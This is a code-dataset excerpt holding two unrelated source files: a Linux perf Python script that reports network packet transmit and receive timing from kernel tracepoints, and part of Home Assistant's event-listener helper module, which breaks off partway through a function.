Hundsbuah/tf700t_kernel | tools/perf/scripts/python/netdev-times.py | 11271 | 15048 | # Display a process of packets and processed time.
# It helps us to investigate networking or network device.
#
# options
# tx: show only tx chart
# rx: show only rx chart
# dev=: show only thing related to specified device
# debug: work with debug mode. It shows buffer status.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
all_event_list = []; # insert all tracepoint events related with this script
irq_dic = {}; # key is cpu and value is a list which stacks irqs
              # which raise NET_RX softirq
net_rx_dic = {}; # key is cpu and value includes time of NET_RX softirq-entry
                 # and a list which stacks receive events
receive_hunk_list = []; # a list which includes a sequence of receive events
rx_skb_list = []; # received packet list for matching
                  # skb_copy_datagram_iovec
buffer_budget = 65536; # the budget of rx_skb_list, tx_queue_list and
                       # tx_xmit_list
of_count_rx_skb_list = 0; # overflow count
tx_queue_list = []; # list of packets which pass through dev_queue_xmit
of_count_tx_queue_list = 0; # overflow count
tx_xmit_list = []; # list of packets which pass through dev_hard_start_xmit
of_count_tx_xmit_list = 0; # overflow count
tx_free_list = []; # list of packets which are freed

# options (parsed in trace_begin)
show_tx = 0;
show_rx = 0;
dev = 0; # store a name of device specified by option "dev="
debug = 0;

# indices of event_info tuple
EINFO_IDX_NAME= 0
EINFO_IDX_CONTEXT=1
EINFO_IDX_CPU= 2
EINFO_IDX_TIME= 3
EINFO_IDX_PID= 4
EINFO_IDX_COMM= 5
# Convert a nanosecond interval (src -> dst) into milliseconds.
def diff_msec(src, dst):
    """Return the time interval from src(nsec) to dst(nsec) in msec."""
    nsec_per_msec = 1000000.0
    delta = dst - src
    return delta / nsec_per_msec
# Display a process of transmitting a packet
def print_transmit(hunk):
    """Print one tx record: device, length, enqueue time and latencies."""
    # Honor the "dev=" option: skip packets from other devices.
    if dev != 0 and hunk['dev'].find(dev) < 0:
        return
    # Columns: dev, len, Qdisc enqueue time, Qdisc latency, driver latency.
    print "%7s %5d %6d.%06dsec %12.3fmsec %12.3fmsec" % \
        (hunk['dev'], hunk['len'],
        nsecs_secs(hunk['queue_t']),
        nsecs_nsecs(hunk['queue_t'])/1000,
        diff_msec(hunk['queue_t'], hunk['xmit_t']),
        diff_msec(hunk['xmit_t'], hunk['free_t']))
# Format strings for displaying rx packet processing; the leading "|"
# characters draw the timeline joints in the report.
PF_IRQ_ENTRY= " irq_entry(+%.3fmsec irq=%d:%s)"
PF_SOFT_ENTRY=" softirq_entry(+%.3fmsec)"
PF_NAPI_POLL= " napi_poll_exit(+%.3fmsec %s)"
PF_JOINT= " |"
PF_WJOINT= " | |"
PF_NET_RECV= " |---netif_receive_skb(+%.3fmsec skb=%x len=%d)"
PF_NET_RX= " |---netif_rx(+%.3fmsec skb=%x)"
PF_CPY_DGRAM= " | skb_copy_datagram_iovec(+%.3fmsec %d:%s)"
PF_KFREE_SKB= " | kfree_skb(+%.3fmsec location=%x)"
PF_CONS_SKB= " | consume_skb(+%.3fmsec)"
# Display a process of received packets and interrupts associated with
# a NET_RX softirq
def print_receive(hunk):
    """Print one rx hunk: its irqs, the softirq entry, and every event.

    All timestamps are printed relative to the first irq entry (base_t).
    """
    show_hunk = 0
    irq_list = hunk['irq_list']
    cpu = irq_list[0]['cpu']
    base_t = irq_list[0]['irq_ent_t']
    # check if this hunk should be shown (honor the "dev=" option)
    if dev != 0:
        for i in range(len(irq_list)):
            if irq_list[i]['name'].find(dev) >= 0:
                show_hunk = 1
                break
    else:
        show_hunk = 1
    if show_hunk == 0:
        return
    print "%d.%06dsec cpu=%d" % \
        (nsecs_secs(base_t), nsecs_nsecs(base_t)/1000, cpu)
    # One section per hard irq, with any netif_rx calls it performed.
    for i in range(len(irq_list)):
        print PF_IRQ_ENTRY % \
            (diff_msec(base_t, irq_list[i]['irq_ent_t']),
            irq_list[i]['irq'], irq_list[i]['name'])
        print PF_JOINT
        irq_event_list = irq_list[i]['event_list']
        for j in range(len(irq_event_list)):
            irq_event = irq_event_list[j]
            if irq_event['event'] == 'netif_rx':
                print PF_NET_RX % \
                    (diff_msec(base_t, irq_event['time']),
                    irq_event['skbaddr'])
                print PF_JOINT
    print PF_SOFT_ENTRY % \
        diff_msec(base_t, hunk['sirq_ent_t'])
    print PF_JOINT
    # Events gathered while the NET_RX softirq was running.
    event_list = hunk['event_list']
    for i in range(len(event_list)):
        event = event_list[i]
        if event['event_name'] == 'napi_poll':
            print PF_NAPI_POLL % \
                (diff_msec(base_t, event['event_t']), event['dev'])
            # The final napi_poll closes the timeline with a blank line.
            if i == len(event_list) - 1:
                print ""
            else:
                print PF_JOINT
        else:
            print PF_NET_RECV % \
                (diff_msec(base_t, event['event_t']), event['skbaddr'],
                event['len'])
            # 'comm' means the skb was copied to user space;
            # 'handle' means it was freed or consumed instead.
            if 'comm' in event.keys():
                print PF_WJOINT
                print PF_CPY_DGRAM % \
                    (diff_msec(base_t, event['comm_t']),
                    event['pid'], event['comm'])
            elif 'handle' in event.keys():
                print PF_WJOINT
                if event['handle'] == "kfree_skb":
                    print PF_KFREE_SKB % \
                        (diff_msec(base_t,
                        event['comm_t']),
                        event['location'])
                elif event['handle'] == "consume_skb":
                    print PF_CONS_SKB % \
                        diff_msec(base_t,
                        event['comm_t'])
            print PF_JOINT
def trace_begin():
    """Parse the script options from sys.argv and set the global flags."""
    global show_tx
    global show_rx
    global dev
    global debug
    # argv[0] is the script name; only real options follow it.
    for arg in sys.argv[1:]:
        if arg == 'tx':
            show_tx = 1
        elif arg == 'rx':
            show_rx = 1
        elif arg.find('dev=', 0, 4) >= 0:
            dev = arg[4:]
        elif arg == 'debug':
            debug = 1
    # Default to showing both directions when neither was requested.
    if show_tx == 0 and show_rx == 0:
        show_tx = 1
        show_rx = 1
def trace_end():
    """Sort the buffered events, correlate them, and print the report."""
    # order all events in time
    # NOTE(review): cmp-based sort is Python 2 only, matching the rest of
    # this script (print statements below).
    all_event_list.sort(lambda a,b :cmp(a[EINFO_IDX_TIME],
                                        b[EINFO_IDX_TIME]))
    # process all events: dispatch each record to its handle_* routine
    for i in range(len(all_event_list)):
        event_info = all_event_list[i]
        name = event_info[EINFO_IDX_NAME]
        if name == 'irq__softirq_exit':
            handle_irq_softirq_exit(event_info)
        elif name == 'irq__softirq_entry':
            handle_irq_softirq_entry(event_info)
        elif name == 'irq__softirq_raise':
            handle_irq_softirq_raise(event_info)
        elif name == 'irq__irq_handler_entry':
            handle_irq_handler_entry(event_info)
        elif name == 'irq__irq_handler_exit':
            handle_irq_handler_exit(event_info)
        elif name == 'napi__napi_poll':
            handle_napi_poll(event_info)
        elif name == 'net__netif_receive_skb':
            handle_netif_receive_skb(event_info)
        elif name == 'net__netif_rx':
            handle_netif_rx(event_info)
        elif name == 'skb__skb_copy_datagram_iovec':
            handle_skb_copy_datagram_iovec(event_info)
        elif name == 'net__net_dev_queue':
            handle_net_dev_queue(event_info)
        elif name == 'net__net_dev_xmit':
            handle_net_dev_xmit(event_info)
        elif name == 'skb__kfree_skb':
            handle_kfree_skb(event_info)
        elif name == 'skb__consume_skb':
            handle_consume_skb(event_info)
    # display receive hunks
    if show_rx:
        for i in range(len(receive_hunk_list)):
            print_receive(receive_hunk_list[i])
    # display transmit hunks
    if show_tx:
        print " dev len Qdisc " \
            " netdevice free"
        for i in range(len(tx_free_list)):
            print_transmit(tx_free_list[i])
    # with "debug": show how full each matching buffer got
    if debug:
        print "debug buffer status"
        print "----------------------------"
        print "xmit Qdisc:remain:%d overflow:%d" % \
            (len(tx_queue_list), of_count_tx_queue_list)
        print "xmit netdevice:remain:%d overflow:%d" % \
            (len(tx_xmit_list), of_count_tx_xmit_list)
        print "receive:remain:%d overflow:%d" % \
            (len(rx_skb_list), of_count_rx_skb_list)
# called from perf, when it finds a corresponding event
def irq__softirq_entry(name, context, cpu, sec, nsec, pid, comm, vec):
    # Only NET_RX softirqs are interesting to this script.
    if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX":
        return
    event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec)
    all_event_list.append(event_info)
def irq__softirq_exit(name, context, cpu, sec, nsec, pid, comm, vec):
    # NOTE(review): "irq__softirq_entry" is used for the symbol lookup here
    # (and in __raise below) — presumably the vec symbol table is registered
    # under that event name; confirm against the perf symbol registration.
    if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX":
        return
    event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec)
    all_event_list.append(event_info)
def irq__softirq_raise(name, context, cpu, sec, nsec, pid, comm, vec):
    if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX":
        return
    event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec)
    all_event_list.append(event_info)
# Tracepoint entry points called by perf: each callback below simply
# timestamps its event (nsecs) and buffers the tuple in all_event_list so
# trace_end() can sort and correlate everything afterwards.
def irq__irq_handler_entry(name, context, cpu, sec, nsec, pid, comm,
        irq, irq_name):
    event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
        irq, irq_name)
    all_event_list.append(event_info)
def irq__irq_handler_exit(name, context, cpu, sec, nsec, pid, comm, irq, ret):
    event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, irq, ret)
    all_event_list.append(event_info)
def napi__napi_poll(name, context, cpu, sec, nsec, pid, comm, napi, dev_name):
    event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
        napi, dev_name)
    all_event_list.append(event_info)
def net__netif_receive_skb(name, context, cpu, sec, nsec, pid, comm, skbaddr,
        skblen, dev_name):
    event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
        skbaddr, skblen, dev_name)
    all_event_list.append(event_info)
def net__netif_rx(name, context, cpu, sec, nsec, pid, comm, skbaddr,
        skblen, dev_name):
    event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
        skbaddr, skblen, dev_name)
    all_event_list.append(event_info)
def net__net_dev_queue(name, context, cpu, sec, nsec, pid, comm,
        skbaddr, skblen, dev_name):
    event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
        skbaddr, skblen, dev_name)
    all_event_list.append(event_info)
def net__net_dev_xmit(name, context, cpu, sec, nsec, pid, comm,
        skbaddr, skblen, rc, dev_name):
    event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
        skbaddr, skblen, rc ,dev_name)
    all_event_list.append(event_info)
def skb__kfree_skb(name, context, cpu, sec, nsec, pid, comm,
        skbaddr, protocol, location):
    event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
        skbaddr, protocol, location)
    all_event_list.append(event_info)
def skb__consume_skb(name, context, cpu, sec, nsec, pid, comm, skbaddr):
    event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
        skbaddr)
    all_event_list.append(event_info)
def skb__skb_copy_datagram_iovec(name, context, cpu, sec, nsec, pid, comm,
        skbaddr, skblen):
    event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm,
        skbaddr, skblen)
    all_event_list.append(event_info)
def handle_irq_handler_entry(event_info):
    """Push a new hard-irq record onto this cpu's irq stack."""
    (name, context, cpu, time, pid, comm, irq, irq_name) = event_info
    record = {'irq':irq, 'name':irq_name, 'cpu':cpu, 'irq_ent_t':time}
    # Create the per-cpu stack on first use, then push the record.
    irq_dic.setdefault(cpu, []).append(record)
def handle_irq_handler_exit(event_info):
    """Close the irq on top of this cpu's stack with its exit time."""
    (name, context, cpu, time, pid, comm, irq, ret) = event_info
    if cpu not in irq_dic.keys():
        return
    irq_record = irq_dic[cpu].pop()
    # Sanity check: the exit must match the irq we pushed on entry.
    if irq != irq_record['irq']:
        return
    irq_record.update({'irq_ext_t':time})
    # if an irq doesn't include NET_RX softirq, drop.
    if 'event_list' in irq_record.keys():
        irq_dic[cpu].append(irq_record)
def handle_irq_softirq_raise(event_info):
    """Attach a NET_RX raise marker to the irq on top of the stack."""
    (name, context, cpu, time, pid, comm, vec) = event_info
    if cpu not in irq_dic.keys() \
       or len(irq_dic[cpu]) == 0:
        return
    # Pop, amend, and re-push the current irq record.
    irq_record = irq_dic[cpu].pop()
    if 'event_list' in irq_record.keys():
        irq_event_list = irq_record['event_list']
    else:
        irq_event_list = []
    irq_event_list.append({'time':time, 'event':'sirq_raise'})
    irq_record.update({'event_list':irq_event_list})
    irq_dic[cpu].append(irq_record)
def handle_irq_softirq_entry(event_info):
    """Open a fresh NET_RX softirq context (entry time + event buffer)."""
    (name, context, cpu, time, pid, comm, vec) = event_info
    net_rx_dic[cpu] = {'sirq_ent_t':time, 'event_list':[]}
def handle_irq_softirq_exit(event_info):
    """Close a NET_RX softirq and merge it with its irqs into a rx hunk."""
    (name, context, cpu, time, pid, comm, vec) = event_info
    irq_list = []
    event_list = 0
    # Collect and clear the per-cpu state gathered since softirq entry.
    if cpu in irq_dic.keys():
        irq_list = irq_dic[cpu]
        del irq_dic[cpu]
    if cpu in net_rx_dic.keys():
        sirq_ent_t = net_rx_dic[cpu]['sirq_ent_t']
        event_list = net_rx_dic[cpu]['event_list']
        del net_rx_dic[cpu]
    # Drop incomplete hunks (no raising irq or no softirq entry seen).
    if irq_list == [] or event_list == 0:
        return
    rec_data = {'sirq_ent_t':sirq_ent_t, 'sirq_ext_t':time,
        'irq_list':irq_list, 'event_list':event_list}
    # merge information related to a NET_RX softirq
    receive_hunk_list.append(rec_data)
def handle_napi_poll(event_info):
    """Append a napi_poll event to this cpu's open NET_RX softirq, if any."""
    (name, context, cpu, time, pid, comm, napi, dev_name) = event_info
    softirq_ctx = net_rx_dic.get(cpu)
    if softirq_ctx is None:
        # No NET_RX softirq in progress on this cpu: nothing to attach to.
        return
    softirq_ctx['event_list'].append(
        {'event_name':'napi_poll', 'dev':dev_name, 'event_t':time})
def handle_netif_rx(event_info):
    """Record a netif_rx call inside the irq on top of this cpu's stack."""
    (name, context, cpu, time, pid, comm,
        skbaddr, skblen, dev_name) = event_info
    if cpu not in irq_dic.keys() \
       or len(irq_dic[cpu]) == 0:
        return
    # Pop, amend, and re-push the current irq record.
    irq_record = irq_dic[cpu].pop()
    if 'event_list' in irq_record.keys():
        irq_event_list = irq_record['event_list']
    else:
        irq_event_list = []
    irq_event_list.append({'time':time, 'event':'netif_rx',
        'skbaddr':skbaddr, 'skblen':skblen, 'dev_name':dev_name})
    irq_record.update({'event_list':irq_event_list})
    irq_dic[cpu].append(irq_record)
def handle_netif_receive_skb(event_info):
    """Log a received skb in the softirq context and in the rx match list."""
    global of_count_rx_skb_list
    (name, context, cpu, time, pid, comm,
        skbaddr, skblen, dev_name) = event_info
    if cpu in net_rx_dic.keys():
        rec_data = {'event_name':'netif_receive_skb',
            'event_t':time, 'skbaddr':skbaddr, 'len':skblen}
        event_list = net_rx_dic[cpu]['event_list']
        event_list.append(rec_data)
        # Newest first; rx_skb_list is later matched against
        # skb_copy_datagram_iovec / kfree_skb by skbaddr.
        rx_skb_list.insert(0, rec_data)
        if len(rx_skb_list) > buffer_budget:
            rx_skb_list.pop()
            of_count_rx_skb_list += 1
def handle_net_dev_queue(event_info):
    """Record a packet entering dev_queue_xmit (Qdisc enqueue)."""
    global of_count_tx_queue_list
    (name, context, cpu, time, pid, comm,
        skbaddr, skblen, dev_name) = event_info
    entry = {'dev':dev_name, 'skbaddr':skbaddr, 'len':skblen, 'queue_t':time}
    # Newest first; matched later by skbaddr in handle_net_dev_xmit.
    tx_queue_list.insert(0, entry)
    # Evict the oldest record once the buffer budget is exceeded.
    while len(tx_queue_list) > buffer_budget:
        tx_queue_list.pop()
        of_count_tx_queue_list += 1
def handle_net_dev_xmit(event_info):
    """Match a successful xmit against its queued record and advance it."""
    global of_count_tx_xmit_list
    (name, context, cpu, time, pid, comm,
        skbaddr, skblen, rc, dev_name) = event_info
    if rc == 0: # NETDEV_TX_OK
        for i in range(len(tx_queue_list)):
            skb = tx_queue_list[i]
            if skb['skbaddr'] == skbaddr:
                skb['xmit_t'] = time
                # Move the record from the Qdisc list to the xmit list.
                tx_xmit_list.insert(0, skb)
                del tx_queue_list[i]
                if len(tx_xmit_list) > buffer_budget:
                    tx_xmit_list.pop()
                    of_count_tx_xmit_list += 1
                return
def handle_kfree_skb(event_info):
    """Resolve a freed skb against the tx queues or the rx match list."""
    (name, context, cpu, time, pid, comm,
        skbaddr, protocol, location) = event_info
    # Freed while still on the Qdisc queue: dropped before xmit.
    for i in range(len(tx_queue_list)):
        skb = tx_queue_list[i]
        if skb['skbaddr'] == skbaddr:
            del tx_queue_list[i]
            return
    # Freed after dev_hard_start_xmit: the transmission is complete.
    for i in range(len(tx_xmit_list)):
        skb = tx_xmit_list[i]
        if skb['skbaddr'] == skbaddr:
            skb['free_t'] = time
            tx_free_list.append(skb)
            del tx_xmit_list[i]
            return
    # Otherwise it was a received packet freed (dropped) by the stack.
    for i in range(len(rx_skb_list)):
        rec_data = rx_skb_list[i]
        if rec_data['skbaddr'] == skbaddr:
            rec_data.update({'handle':"kfree_skb",
                'comm':comm, 'pid':pid, 'comm_t':time})
            del rx_skb_list[i]
            return
def handle_consume_skb(event_info):
    """A consumed tx skb marks the end of its life: record the free time."""
    (name, context, cpu, time, pid, comm, skbaddr) = event_info
    for i in range(len(tx_xmit_list)):
        skb = tx_xmit_list[i]
        if skb['skbaddr'] == skbaddr:
            skb['free_t'] = time
            tx_free_list.append(skb)
            del tx_xmit_list[i]
            return
def handle_skb_copy_datagram_iovec(event_info):
    """Mark an rx skb as delivered to user space by the copying process."""
    (name, context, cpu, time, pid, comm, skbaddr, skblen) = event_info
    for i in range(len(rx_skb_list)):
        rec_data = rx_skb_list[i]
        if skbaddr == rec_data['skbaddr']:
            rec_data.update({'handle':"skb_copy_datagram_iovec",
                'comm':comm, 'pid':pid, 'comm_t':time})
            del rx_skb_list[i]
            return
| gpl-2.0 |
mKeRix/home-assistant | homeassistant/helpers/event.py | 2 | 21555 | """Helpers for listening to events."""
import asyncio
from datetime import datetime, timedelta
import functools as ft
import logging
import time
from typing import Any, Awaitable, Callable, Dict, Iterable, Optional, Union
import attr
from homeassistant.const import (
ATTR_NOW,
EVENT_CORE_CONFIG_UPDATE,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
MATCH_ALL,
SUN_EVENT_SUNRISE,
SUN_EVENT_SUNSET,
)
from homeassistant.core import CALLBACK_TYPE, Event, HomeAssistant, State, callback
from homeassistant.helpers.entity_registry import EVENT_ENTITY_REGISTRY_UPDATED
from homeassistant.helpers.sun import get_astral_event_next
from homeassistant.helpers.template import Template
from homeassistant.loader import bind_hass
from homeassistant.util import dt as dt_util
from homeassistant.util.async_ import run_callback_threadsafe
# hass.data keys for the entity_id -> callbacks routing tables and for the
# single shared bus listener that dispatches into each table.
TRACK_STATE_CHANGE_CALLBACKS = "track_state_change_callbacks"
TRACK_STATE_CHANGE_LISTENER = "track_state_change_listener"
TRACK_ENTITY_REGISTRY_UPDATED_CALLBACKS = "track_entity_registry_updated_callbacks"
TRACK_ENTITY_REGISTRY_UPDATED_LISTENER = "track_entity_registry_updated_listener"

_LOGGER = logging.getLogger(__name__)
# PyLint does not like the use of threaded_listener_factory
# pylint: disable=invalid-name
def threaded_listener_factory(async_factory: Callable[..., Any]) -> CALLBACK_TYPE:
    """Convert an async event helper to a threaded one."""

    @ft.wraps(async_factory)
    def factory(*args: Any, **kwargs: Any) -> CALLBACK_TYPE:
        """Call async event helper safely."""
        # By convention every async_* helper takes hass as its first argument.
        hass = args[0]

        if not isinstance(hass, HomeAssistant):
            raise TypeError("First parameter needs to be a hass instance")

        # Run the async factory on the event loop and block until the
        # unsubscribe callback is available.
        async_remove = run_callback_threadsafe(
            hass.loop, ft.partial(async_factory, *args, **kwargs)
        ).result()

        def remove() -> None:
            """Threadsafe removal."""
            run_callback_threadsafe(hass.loop, async_remove).result()

        return remove

    return factory
@callback
@bind_hass
def async_track_state_change(
    hass: HomeAssistant,
    entity_ids: Union[str, Iterable[str]],
    action: Callable[[str, State, State], None],
    from_state: Union[None, str, Iterable[str]] = None,
    to_state: Union[None, str, Iterable[str]] = None,
) -> CALLBACK_TYPE:
    """Track specific state changes.

    entity_ids, from_state and to_state can be string or list.
    Use list to match multiple.

    Returns a function that can be called to remove the listener.

    If entity_ids are not MATCH_ALL along with from_state and to_state
    being None, async_track_state_change_event should be used instead
    as it is slightly faster.

    Must be run within the event loop.
    """
    if from_state is not None:
        match_from_state = process_state_match(from_state)
    if to_state is not None:
        match_to_state = process_state_match(to_state)

    # Ensure it is a lowercase list with entity ids we want to match on
    if entity_ids == MATCH_ALL:
        pass
    elif isinstance(entity_ids, str):
        entity_ids = (entity_ids.lower(),)
    else:
        entity_ids = tuple(entity_id.lower() for entity_id in entity_ids)

    @callback
    def state_change_listener(event: Event) -> None:
        """Handle specific state changes."""
        # Filter on the old state, then the new state; a missing state
        # object (entity just added/removed) is matched as None.
        if from_state is not None:
            old_state = event.data.get("old_state")
            if old_state is not None:
                old_state = old_state.state

            if not match_from_state(old_state):
                return
        if to_state is not None:
            new_state = event.data.get("new_state")
            if new_state is not None:
                new_state = new_state.state

            if not match_to_state(new_state):
                return

        hass.async_run_job(
            action,
            event.data.get("entity_id"),
            event.data.get("old_state"),
            event.data.get("new_state"),
        )

    if entity_ids != MATCH_ALL:
        # If we have a list of entity ids we use
        # async_track_state_change_event to route
        # by entity_id to avoid iterating though state change
        # events and creating a jobs where the most
        # common outcome is to return right away because
        # the entity_id does not match since usually
        # only one or two listeners want that specific
        # entity_id.
        return async_track_state_change_event(hass, entity_ids, state_change_listener)

    return hass.bus.async_listen(EVENT_STATE_CHANGED, state_change_listener)


track_state_change = threaded_listener_factory(async_track_state_change)
@bind_hass
def async_track_state_change_event(
    hass: HomeAssistant,
    entity_ids: Union[str, Iterable[str]],
    action: Callable[[Event], Any],
) -> Callable[[], None]:
    """Track specific state change events indexed by entity_id.

    Unlike async_track_state_change, async_track_state_change_event
    passes the full event to the callback.

    In order to avoid having to iterate a long list
    of EVENT_STATE_CHANGED and fire and create a job
    for each one, we keep a dict of entity ids that
    care about the state change events so we can
    do a fast dict lookup to route events.
    """
    entity_callbacks = hass.data.setdefault(TRACK_STATE_CHANGE_CALLBACKS, {})

    # Install the single shared bus listener lazily, on first use.
    if TRACK_STATE_CHANGE_LISTENER not in hass.data:

        @callback
        def _async_state_change_dispatcher(event: Event) -> None:
            """Dispatch state changes by entity_id."""
            entity_id = event.data.get("entity_id")

            if entity_id not in entity_callbacks:
                return

            # Iterate over a copy so callbacks may unsubscribe themselves.
            for action in entity_callbacks[entity_id][:]:
                try:
                    hass.async_run_job(action, event)
                except Exception:  # pylint: disable=broad-except
                    _LOGGER.exception(
                        "Error while processing state changed for %s", entity_id
                    )

        hass.data[TRACK_STATE_CHANGE_LISTENER] = hass.bus.async_listen(
            EVENT_STATE_CHANGED, _async_state_change_dispatcher
        )

    if isinstance(entity_ids, str):
        entity_ids = [entity_ids]

    entity_ids = [entity_id.lower() for entity_id in entity_ids]

    for entity_id in entity_ids:
        entity_callbacks.setdefault(entity_id, []).append(action)

    @callback
    def remove_listener() -> None:
        """Remove state change listener."""
        _async_remove_entity_listeners(
            hass,
            TRACK_STATE_CHANGE_CALLBACKS,
            TRACK_STATE_CHANGE_LISTENER,
            entity_ids,
            action,
        )

    return remove_listener
@callback
def _async_remove_entity_listeners(
    hass: HomeAssistant,
    storage_key: str,
    listener_key: str,
    entity_ids: Iterable[str],
    action: Callable[[Event], Any],
) -> None:
    """Remove a listener."""
    entity_callbacks = hass.data[storage_key]

    for entity_id in entity_ids:
        callbacks_for_entity = entity_callbacks[entity_id]
        callbacks_for_entity.remove(action)
        # Drop the per-entity bucket once its last callback is gone.
        if not callbacks_for_entity:
            del entity_callbacks[entity_id]

    # When no entity has callbacks left, unsubscribe the shared bus
    # listener and forget its unsubscribe handle as well.
    if not entity_callbacks:
        hass.data[listener_key]()
        del hass.data[listener_key]
@bind_hass
def async_track_entity_registry_updated_event(
    hass: HomeAssistant,
    entity_ids: Union[str, Iterable[str]],
    action: Callable[[Event], Any],
) -> Callable[[], None]:
    """Track specific entity registry updated events indexed by entity_id.

    Similar to async_track_state_change_event.
    """
    entity_callbacks = hass.data.setdefault(TRACK_ENTITY_REGISTRY_UPDATED_CALLBACKS, {})

    # Install the single shared bus listener lazily, on first use.
    if TRACK_ENTITY_REGISTRY_UPDATED_LISTENER not in hass.data:

        @callback
        def _async_entity_registry_updated_dispatcher(event: Event) -> None:
            """Dispatch entity registry updates by entity_id."""
            # A rename carries old_entity_id; route on the id callers know.
            entity_id = event.data.get("old_entity_id", event.data["entity_id"])

            if entity_id not in entity_callbacks:
                return

            # Iterate over a copy so callbacks may unsubscribe themselves.
            for action in entity_callbacks[entity_id][:]:
                try:
                    hass.async_run_job(action, event)
                except Exception:  # pylint: disable=broad-except
                    _LOGGER.exception(
                        "Error while processing entity registry update for %s",
                        entity_id,
                    )

        hass.data[TRACK_ENTITY_REGISTRY_UPDATED_LISTENER] = hass.bus.async_listen(
            EVENT_ENTITY_REGISTRY_UPDATED, _async_entity_registry_updated_dispatcher
        )

    if isinstance(entity_ids, str):
        entity_ids = [entity_ids]

    entity_ids = [entity_id.lower() for entity_id in entity_ids]

    for entity_id in entity_ids:
        entity_callbacks.setdefault(entity_id, []).append(action)

    @callback
    def remove_listener() -> None:
        """Remove state change listener."""
        _async_remove_entity_listeners(
            hass,
            TRACK_ENTITY_REGISTRY_UPDATED_CALLBACKS,
            TRACK_ENTITY_REGISTRY_UPDATED_LISTENER,
            entity_ids,
            action,
        )

    return remove_listener
@callback
@bind_hass
def async_track_template(
    hass: HomeAssistant,
    template: Template,
    action: Callable[[str, State, State], None],
    variables: Optional[Dict[str, Any]] = None,
) -> CALLBACK_TYPE:
    """Add a listener that track state changes with template condition."""
    from . import condition  # pylint: disable=import-outside-toplevel

    # Local variable to keep track of if the action has already been triggered
    already_triggered = False

    @callback
    def template_condition_listener(entity_id: str, from_s: State, to_s: State) -> None:
        """Check if condition is correct and run action."""
        nonlocal already_triggered
        template_result = condition.async_template(hass, template, variables)

        # Check to see if template returns true; fire only on the
        # False -> True transition, then re-arm once it turns False again.
        if template_result and not already_triggered:
            already_triggered = True
            hass.async_run_job(action, entity_id, from_s, to_s)
        elif not template_result:
            already_triggered = False

    # Track only the entities the template actually references.
    return async_track_state_change(
        hass, template.extract_entities(variables), template_condition_listener
    )


track_template = threaded_listener_factory(async_track_template)
@callback
@bind_hass
def async_track_same_state(
    hass: HomeAssistant,
    period: timedelta,
    action: Callable[..., None],
    async_check_same_func: Callable[[str, Optional[State], Optional[State]], bool],
    entity_ids: Union[str, Iterable[str]] = MATCH_ALL,
) -> CALLBACK_TYPE:
    """Track the state of entities for a period and run an action.

    If async_check_func is None it use the state of orig_value.
    Without entity_ids we track all state changes.
    """
    async_remove_state_for_cancel: Optional[CALLBACK_TYPE] = None
    async_remove_state_for_listener: Optional[CALLBACK_TYPE] = None

    @callback
    def clear_listener() -> None:
        """Clear all unsub listener."""
        nonlocal async_remove_state_for_cancel, async_remove_state_for_listener

        if async_remove_state_for_listener is not None:
            async_remove_state_for_listener()
            async_remove_state_for_listener = None
        if async_remove_state_for_cancel is not None:
            async_remove_state_for_cancel()
            async_remove_state_for_cancel = None

    @callback
    def state_for_listener(now: Any) -> None:
        """Fire on state changes after a delay and calls action."""
        nonlocal async_remove_state_for_listener
        # The timer already fired; only the cancel listener needs removal.
        async_remove_state_for_listener = None
        clear_listener()
        hass.async_run_job(action)

    @callback
    def state_for_cancel_listener(event: Event) -> None:
        """Fire on changes and cancel for listener if changed."""
        entity: str = event.data["entity_id"]
        from_state: Optional[State] = event.data.get("old_state")
        to_state: Optional[State] = event.data.get("new_state")

        # Any change that fails the check aborts the countdown.
        if not async_check_same_func(entity, from_state, to_state):
            clear_listener()

    async_remove_state_for_listener = async_track_point_in_utc_time(
        hass, state_for_listener, dt_util.utcnow() + period
    )

    if entity_ids == MATCH_ALL:
        async_remove_state_for_cancel = hass.bus.async_listen(
            EVENT_STATE_CHANGED, state_for_cancel_listener
        )
    else:
        async_remove_state_for_cancel = async_track_state_change_event(
            hass,
            [entity_ids] if isinstance(entity_ids, str) else entity_ids,
            state_for_cancel_listener,
        )

    return clear_listener


track_same_state = threaded_listener_factory(async_track_same_state)
@callback
@bind_hass
def async_track_point_in_time(
    hass: HomeAssistant, action: Callable[..., None], point_in_time: datetime
) -> CALLBACK_TYPE:
    """Add a listener that fires once after a specific point in time."""

    @callback
    def utc_converter(utc_now: datetime) -> None:
        """Convert passed in UTC now to local now."""
        local_now = dt_util.as_local(utc_now)
        hass.async_run_job(action, local_now)

    # Delegate the scheduling to the UTC variant; only the timestamp handed
    # to the action is converted to local time.
    return async_track_point_in_utc_time(hass, utc_converter, point_in_time)


track_point_in_time = threaded_listener_factory(async_track_point_in_time)
@callback
@bind_hass
def async_track_point_in_utc_time(
    hass: HomeAssistant, action: Callable[..., Any], point_in_time: datetime
) -> CALLBACK_TYPE:
    """Add a listener that fires once after a specific point in UTC time."""
    # Ensure point_in_time is UTC
    utc_point_in_time = dt_util.as_utc(point_in_time)

    # Translate the wall-clock target into the loop's monotonic clock by
    # offsetting the loop time with the remaining wall-clock delta.
    cancel_callback = hass.loop.call_at(
        hass.loop.time() + point_in_time.timestamp() - time.time(),
        hass.async_run_job,
        action,
        utc_point_in_time,
    )

    @callback
    def unsub_point_in_time_listener() -> None:
        """Cancel the call_later."""
        cancel_callback.cancel()

    return unsub_point_in_time_listener


track_point_in_utc_time = threaded_listener_factory(async_track_point_in_utc_time)
@callback
@bind_hass
def async_call_later(
    hass: HomeAssistant, delay: float, action: Callable[..., None]
) -> CALLBACK_TYPE:
    """Add a listener that is called in <delay>."""
